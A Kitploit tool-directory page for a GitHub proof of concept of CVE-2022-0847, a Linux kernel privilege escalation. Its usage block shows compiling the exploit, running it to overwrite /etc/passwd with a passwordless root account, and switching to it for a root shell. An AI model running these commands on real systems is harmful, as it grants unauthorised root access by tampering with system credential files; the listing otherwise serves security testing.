Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE_2022_0847 — CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability | Kitploit
Tools/GitHubGitHub/ahrixia/cve_2022_0847
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingBinary Exploitation
GitHubahrixia/cve_2022_0847

CVE_2022_0847

CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability

View Repository
21154 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE_2022_0847

CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability


POC

A Simple Proof of concept to get root shell.

root@kitploit:~
$ gcc cve_2022_0847.c -o exploit
$ ./exploit /etc/passwd 1 ootz:
$ su rootz
# id
uid=0(root) gid=0(root) groups=0(root)
Download Tool